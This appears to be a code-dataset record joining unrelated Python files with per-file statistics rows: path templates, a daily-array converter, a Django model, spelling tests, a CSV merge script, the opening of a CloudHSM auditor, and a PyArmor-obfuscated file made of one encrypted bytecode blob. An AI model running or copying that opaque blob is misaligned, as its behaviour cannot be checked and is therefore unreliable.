output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.policy_type}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}"
else:
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
if cfg.meta.use_spatial_softmax:
spatial_softmax_str = "_spatial_softmax"
else:
spatial_softmax_str = ""
if cfg.meta_cvae_cfg.enable:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}_cvae"
else:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
if cfg.meta.random_affine:
model_name += "_data_aug"
summary_writer_name = model_name
model_name += ".pth"
# summary_writer_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
return EasyDict({"output_dir": output_dir,
"model_name": model_name,
"summary_writer_name": summary_writer_name})
def cp_meta_path_template(cfg):
folder_path = cfg.folder
modality_str = get_modalities_str(cfg)
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/cp_meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
if cfg.meta.use_spatial_softmax:
spatial_softmax_str = "_spatial_softmax"
else:
spatial_softmax_str = ""
if cfg.meta_cvae_cfg.enable:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}_cvae"
else:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
if cfg.meta.random_affine:
model_name += "_data_aug"
summary_writer_name = model_name
model_name += ".pth"
return EasyDict({"output_dir": output_dir,
"model_name": model_name,
"summary_writer_name": summary_writer_name})
def subgoal_embedding_path_template(cfg, modality_str):
folder_path = cfg.folder
subgoal_embedding_file_name = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.agglomoration.K}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}_embedding.hdf5"
return subgoal_embedding_file_name
def singletask_subgoal_embedding_path_template(cfg, modality_str):
folder_path = cfg.folder
if cfg.multitask.training_task_id == -1:
if cfg.skill_cvae_cfg.enable:
subgoal_embedding_file_name = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.agglomoration.K}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}_cvae_{cfg.skill_subgoal_cfg.subgoal_type}_embedding.hdf5"
else:
subgoal_embedding_file_name = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.agglomoration.K}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}_embedding.hdf5"
else:
print("Single task training")
subgoal_embedding_file_name = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/task_{cfg.multitask.training_task_id}_{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.agglomoration.K}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}_embedding.hdf5"
return subgoal_embedding_file_name
def multitask_meta_path_template(cfg):
folder_path = cfg.folder
modality_str = get_modalities_str(cfg)
if cfg.multitask.training_task_id == -1:
# Train on individual initial configurations
if cfg.skill_training.policy_type == "no_subgoal":
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.policy_type}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}/{cfg.multitask.task_id}"
else:
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}/{cfg.multitask.task_id}"
else:
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}/task_{cfg.multitask.training_task_id}"
if cfg.meta.use_spatial_softmax:
spatial_softmax_str = "_spatial_softmax"
else:
spatial_softmax_str = ""
if cfg.meta_cvae_cfg.enable:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}_cvae"
else:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
if cfg.multitask.testing_percentage < 1.0:
model_name += f"_{cfg.multitask.testing_percentage}"
if cfg.meta.random_affine:
model_name += "_data_aug"
summary_writer_name = model_name
model_name += ".pth"
return EasyDict({"output_dir": output_dir,
"model_name": model_name,
"summary_writer_name": summary_writer_name})
def singletask_multitask_meta_path_template(cfg):
folder_path = cfg.folder
modality_str = get_modalities_str(cfg)
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}/singletask_{cfg.multitask.training_task_id}"
if cfg.meta.use_spatial_softmax:
spatial_softmax_str = "_spatial_softmax"
else:
spatial_softmax_str = ""
if cfg.meta_cvae_cfg.enable:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}_cvae"
else:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
if cfg.multitask.testing_percentage < 1.0:
model_name += f"_{cfg.multitask.testing_percentage}"
if cfg.meta.random_affine:
model_name += "_data_aug"
summary_writer_name = model_name
model_name += ".pth"
return EasyDict({"output_dir": output_dir,
"model_name": model_name,
"summary_writer_name": summary_writer_name})
| 63.114754 | 472 | 0.76961 | 2,175 | 15,400 | 4.952644 | 0.044138 | 0.072039 | 0.081693 | 0.068511 | 0.966859 | 0.965095 | 0.958411 | 0.952284 | 0.952284 | 0.952284 | 0 | 0.000739 | 0.121234 | 15,400 | 243 | 473 | 63.374486 | 0.795241 | 0.014026 | 0 | 0.776536 | 0 | 0.139665 | 0.584151 | 0.553389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072626 | false | 0 | 0.011173 | 0 | 0.156425 | 0.078212 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cf48e64fe79075326b4df30cb09eece2488dd159 | 7,757 | py | Python | gwlfe/DailyArrayConverter.py | rajadain/gwlf-e | ba2fb9dbc08a3d7a4ced4b83b6f0f1307814e2a3 | [
"Apache-2.0"
] | null | null | null | gwlfe/DailyArrayConverter.py | rajadain/gwlf-e | ba2fb9dbc08a3d7a4ced4b83b6f0f1307814e2a3 | [
"Apache-2.0"
] | null | null | null | gwlfe/DailyArrayConverter.py | rajadain/gwlf-e | ba2fb9dbc08a3d7a4ced4b83b6f0f1307814e2a3 | [
"Apache-2.0"
] | null | null | null | import random
import numpy as np
import numpy.ma as ma
# from numba import jit
from numpy import array
from numpy import r_
from numpy import ravel
from numpy import where
from numpy import zeros
leap_year = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
True, True, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, True, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, True, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, True, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, True, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False]
non_leap_year = [False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, True, True, True, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, True, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, True, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, True, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False, True,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False, False, False, False, False, False, False, False, False, False, False, False,
False, False, False]
def mask_builder(DaysMonth):
ones = ravel(np.ones((12, 31))).astype("int")
slices = []
for i, month in enumerate(DaysMonth[0]):
slices.append(slice(31 * i, 31 * i + month))
ones[r_[tuple(slices)]] = 0
return ones
def ymd_to_daily(ymd_array, DaysMonth):
month_maps = [leap_year if x[1] == 29 else non_leap_year for x in DaysMonth]
mask = ravel(array(month_maps))
x = ma.array(ymd_array, mask=mask)
return x[~x.mask]
def daily_to_ymd(daily_array, NYrs, DaysMonth):
result = zeros((NYrs * 12 * 31,))
month_maps = [leap_year if x[1] == 29 else non_leap_year for x in DaysMonth]
mask = ravel(array(month_maps))
x = ma.array(result, mask=mask)
x[~x.mask] = daily_array
return x.reshape((NYrs, 12, 31))
def ymd_to_daily_slow(ymd_array, NYrs, DaysMonth):
result = []
for Y in range(NYrs):
for i in range(12):
for j in range(DaysMonth[Y][i]):
result.append(ymd_array[Y][i][j])
return array(result)
def get_value_for_yesterday(variable, variable_0, Y_in, i_in, j_in, DaysMonth):
temp = array(variable)
key = random.randint(100000000000, 999999999999) # use something that is hopefully unique so we can find it again
temp[Y_in, i_in, j_in] = key
temp = ymd_to_daily(temp, DaysMonth)
today = where(temp == key)[0]
if (len(today) != 1):
raise AssertionError("this array has values equal to the key")
if (today[0] - 1 >= 0):
return temp[today[0] - 1]
else: # at the first index of the array
return variable_0
| 68.646018 | 120 | 0.630914 | 1,035 | 7,757 | 4.687923 | 0.08599 | 1.481863 | 2.185697 | 2.864798 | 0.805647 | 0.805647 | 0.801937 | 0.801937 | 0.801937 | 0.801937 | 0 | 0.010092 | 0.246358 | 7,757 | 112 | 121 | 69.258929 | 0.819877 | 0.014954 | 0 | 0.44898 | 0 | 0 | 0.005369 | 0 | 0 | 0 | 0 | 0 | 0.010204 | 1 | 0.05102 | false | 0 | 0.081633 | 0 | 0.193878 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d8b2b72de719f9a086fbd84dfe1765a4c270495b | 188 | py | Python | rameniaapp/models/tag.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
] | null | null | null | rameniaapp/models/tag.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
] | null | null | null | rameniaapp/models/tag.py | awlane/ramenia | 6bf8e75a1f279ac584daa4ee19927ffccaa67551 | [
"MIT"
] | null | null | null | from django.db import models
from .noodle import Noodle
class Tag(models.Model):
name = models.CharField(max_length=20, unique=True)
description = models.CharField(max_length=140) | 31.333333 | 55 | 0.771277 | 27 | 188 | 5.296296 | 0.666667 | 0.20979 | 0.251748 | 0.335664 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030675 | 0.132979 | 188 | 6 | 56 | 31.333333 | 0.846626 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d8c507b66c4545c7002ce30cf0a98e0dc22751a6 | 1,990 | py | Python | test/programytest/storage/asserts/store/assert_spelling.py | cdoebler1/AIML2 | ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a | [
"MIT"
] | 345 | 2016-11-23T22:37:04.000Z | 2022-03-30T20:44:44.000Z | test/programytest/storage/asserts/store/assert_spelling.py | MikeyBeez/program-y | 00d7a0c7d50062f18f0ab6f4a041068e119ef7f0 | [
"MIT"
] | 275 | 2016-12-07T10:30:28.000Z | 2022-02-08T21:28:33.000Z | test/programytest/storage/asserts/store/assert_spelling.py | VProgramMist/modified-program-y | f32efcafafd773683b3fe30054d5485fe9002b7d | [
"MIT"
] | 159 | 2016-11-28T18:59:30.000Z | 2022-03-20T18:02:44.000Z | import os
import os.path
import unittest
from programy.spelling.norvig import NorvigSpellingChecker
class SpellingStoreAsserts(unittest.TestCase):
def assert_upload_from_file(self, store, verbose):
store.empty()
store.upload_from_file(os.path.dirname(__file__) + os.sep + "data" + os.sep + "spelling" + os.sep + "corpus.txt", verbose=verbose)
spelling_checker = NorvigSpellingChecker()
self.assertEquals(0, len(spelling_checker.words))
self.assertEquals(0, spelling_checker.sum_of_words)
store.load_spelling(spelling_checker)
self.assertEquals(9, len(spelling_checker.words))
self.assertEquals(9, spelling_checker.sum_of_words)
self.assertEqual("THESE ARE SOME WORDS", spelling_checker.correct("Thise ara sime wards"))
def assert_upload_from_file_no_corpus(self, store, verbose):
store.empty()
spelling_checker = NorvigSpellingChecker()
store.load_spelling(spelling_checker)
spelling_checker = NorvigSpellingChecker()
self.assertEquals(0, len(spelling_checker.words))
self.assertEquals(0, spelling_checker.sum_of_words)
store.load_spelling(spelling_checker)
self.assertEquals(0, len(spelling_checker.words))
self.assertEquals(0, spelling_checker.sum_of_words)
def assert_upload_from_file_exception(self, store, verbose):
store.empty()
spelling_checker = NorvigSpellingChecker()
store.load_spelling(spelling_checker)
store.upload_from_file(os.path.dirname(__file__) + os.sep + "data" + os.sep + "spelling" + os.sep + "corpus.txt", verbose=verbose)
spelling_checker = NorvigSpellingChecker()
self.assertEquals(0, len(spelling_checker.words))
self.assertEquals(0, spelling_checker.sum_of_words)
store.load_spelling(spelling_checker)
self.assertEquals(0, len(spelling_checker.words))
self.assertEquals(0, spelling_checker.sum_of_words)
| 33.728814 | 138 | 0.719095 | 233 | 1,990 | 5.866953 | 0.193133 | 0.252377 | 0.12436 | 0.100951 | 0.840527 | 0.752743 | 0.724214 | 0.724214 | 0.724214 | 0.724214 | 0 | 0.007385 | 0.183417 | 1,990 | 58 | 139 | 34.310345 | 0.833846 | 0 | 0 | 0.694444 | 0 | 0 | 0.042211 | 0 | 0 | 0 | 0 | 0 | 0.472222 | 1 | 0.083333 | false | 0 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
41f0ee845d47437a589732fdeb63de5ac3c67df0 | 139 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/calculators/calc_global.py | SiliconLabs/gecko_sdk | 310814a9016b60a8012d50c62cc168a783ac102b | [
"Zlib"
] | 69 | 2021-12-16T01:34:09.000Z | 2022-03-31T08:27:39.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/calculators/calc_global.py | SiliconLabs/gecko_sdk | 310814a9016b60a8012d50c62cc168a783ac102b | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/calculators/calc_global.py | SiliconLabs/gecko_sdk | 310814a9016b60a8012d50c62cc168a783ac102b | [
"Zlib"
] | 21 | 2021-12-20T09:05:45.000Z | 2022-03-28T02:52:28.000Z | from pyradioconfig.parts.ocelot.calculators.calc_global import CALC_Global_ocelot
class CALC_Global_Margay(CALC_Global_ocelot):
pass
| 23.166667 | 81 | 0.856115 | 19 | 139 | 5.894737 | 0.578947 | 0.357143 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093525 | 139 | 5 | 82 | 27.8 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
5101615bf5406c08838ae4ba6590aa250e0f477a | 995 | py | Python | Three_Part_Moudule/PyArmor/dist/b.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
] | 2 | 2019-01-24T15:06:59.000Z | 2019-01-25T07:34:45.000Z | Three_Part_Moudule/PyArmor/dist/b.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
] | 1 | 2019-12-23T09:45:11.000Z | 2019-12-23T09:45:11.000Z | Three_Part_Moudule/PyArmor/dist/b.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
] | 1 | 2019-07-18T14:21:35.000Z | 2019-07-18T14:21:35.000Z | __pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x07\x00\x42\x0d\x0d\x0a\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\xaf\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\x50\x8c\x64\x26\x42\xd6\x01\x10\x54\xca\x9c\xb6\x36\x84\x05\x6a\x0b\xf3\xc4\x16\x01\xbe\x47\xe4\xba\x27\x21\x43\xd2\xf0\xab\x91\xf2\xe4\x6b\x96\x6d\x38\x10\xbf\xea\xc7\xa7\x5e\x9e\x57\xae\xba\xa8\x32\x3d\x72\x7a\xd9\x99\x27\xfe\x8b\x46\xfd\x72\xea\x9e\x85\xa7\x63\x71\x39\x45\x1b\xac\xe6\xad\xf2\x06\x4e\x71\x90\x1c\x01\xab\x24\x11\x02\xff\x14\xc7\xe8\x97\x34\x85\x07\x67\x55\xd3\xf6\xcf\x62\xcf\x1a\xe5\xf6\x42\x0c\x7a\x61\xa3\x90\xae\xf6\x13\x86\x91\xae\xf4\x4e\xdf\xfa\x72\xe2\x94\x59\x2a\x06\xcf\xa7\x7d\x07\xdc\x6b\xf0\x1d\xc6\x93\xc2\x87\x65\x24\x56\xb7\xb7\x02\x2b\xf9\x74\x4a\x75\x49\x4c\x0c\xbe\x52\x08\x5b\x20\xf5\xca\x56\xe0\x3c\xc2\xd8\xc1\x94\x18\x0a\x5b\xe7\x41\x91\xe6\x3f\x12\x31', 1) | 995 | 995 | 0.749749 | 244 | 995 | 3.008197 | 0.586066 | 0.318801 | 0.404632 | 0.457766 | 0.151226 | 0.151226 | 0.126703 | 0.098093 | 0.098093 | 0.098093 | 0 | 0.350806 | 0.003015 | 995 | 1 | 995 | 995 | 0.389113 | 0 | 0 | 0 | 0 | 1 | 0.959839 | 0.959839 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
5a91dcead878d8927ec209f8a3972c361cdbab59 | 1,228 | py | Python | python/merge_result.py | SantyagoSeaman/Kaggle-The-Allen-AI-Science-Challenge | 199f58b0e2c7e872dd2a03be51412d256edee13a | [
"Apache-2.0"
] | 1 | 2019-09-10T15:49:53.000Z | 2019-09-10T15:49:53.000Z | python/merge_result.py | SantyagoSeaman/Kaggle-The-Allen-AI-Science-Challenge | 199f58b0e2c7e872dd2a03be51412d256edee13a | [
"Apache-2.0"
] | null | null | null | python/merge_result.py | SantyagoSeaman/Kaggle-The-Allen-AI-Science-Challenge | 199f58b0e2c7e872dd2a03be51412d256edee13a | [
"Apache-2.0"
] | null | null | null | import datetime
import pandas as pd
sample_submission = pd.read_csv('data/sample_submission.csv')
v0 = pd.read_csv('data/impl_3_2016-02-02-09-46-39__3800.csv')
v1 = pd.read_csv('data/impl_3_2016-02-02-12-28-33__4900.csv')
v2 = pd.read_csv('data/impl_3_2016-02-02-23-16-05__7400.csv')
v3 = pd.read_csv('data/impl_3_2016-02-03-01-21-59__8100.csv')
sample_submission[0:3800] = v0[0:3800]
sample_submission[3800:4900] = v1[3800:4900]
sample_submission[4900:7400] = v2[4900:7400]
sample_submission[7400:8100] = v3[7400:8100]
sample_submission.to_csv(
'data/total_3_' + datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S") + '.csv',
index=False
)
v0 = pd.read_csv('data/impl_5_2016-02-02-09-46-39__3800.csv')
v1 = pd.read_csv('data/impl_5_2016-02-02-12-28-34__4900.csv')
v2 = pd.read_csv('data/impl_5_2016-02-02-23-16-05__7400.csv')
v3 = pd.read_csv('data/impl_5_2016-02-03-01-21-24__8100.csv')
sample_submission[0:3800] = v0[0:3800]
sample_submission[3800:4900] = v1[3800:4900]
sample_submission[4900:7400] = v2[4900:7400]
sample_submission[7400:8100] = v3[7400:8100]
sample_submission.to_csv(
'data/total_5_' + datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S") + '.csv',
index=False
)
| 32.315789 | 89 | 0.715798 | 231 | 1,228 | 3.549784 | 0.21645 | 0.234146 | 0.09878 | 0.142683 | 0.892683 | 0.868293 | 0.863415 | 0.863415 | 0.82439 | 0.714634 | 0 | 0.256963 | 0.093648 | 1,228 | 37 | 90 | 33.189189 | 0.479784 | 0 | 0 | 0.444444 | 0 | 0 | 0.344209 | 0.288744 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5adea9a2341747d6afa842263518fe164ed9fe64 | 19,249 | py | Python | eeauditor/auditors/aws/AWS_CloudHSM_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 442 | 2020-03-15T20:56:36.000Z | 2022-03-31T22:13:07.000Z | eeauditor/auditors/aws/AWS_CloudHSM_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 57 | 2020-03-15T22:09:56.000Z | 2022-03-31T13:17:06.000Z | eeauditor/auditors/aws/AWS_CloudHSM_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 59 | 2020-03-15T21:19:10.000Z | 2022-03-31T15:01:31.000Z | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
import json
import os
from check_register import CheckRegister
registry = CheckRegister()
cloudhsm = boto3.client("cloudhsmv2")
def describe_clusters(cache):
response = cache.get("describe_clusters")
if response:
return response
cache["describe_clusters"] = cloudhsm.describe_clusters()
return cache["describe_clusters"]
@registry.register_check("cloudhsm")
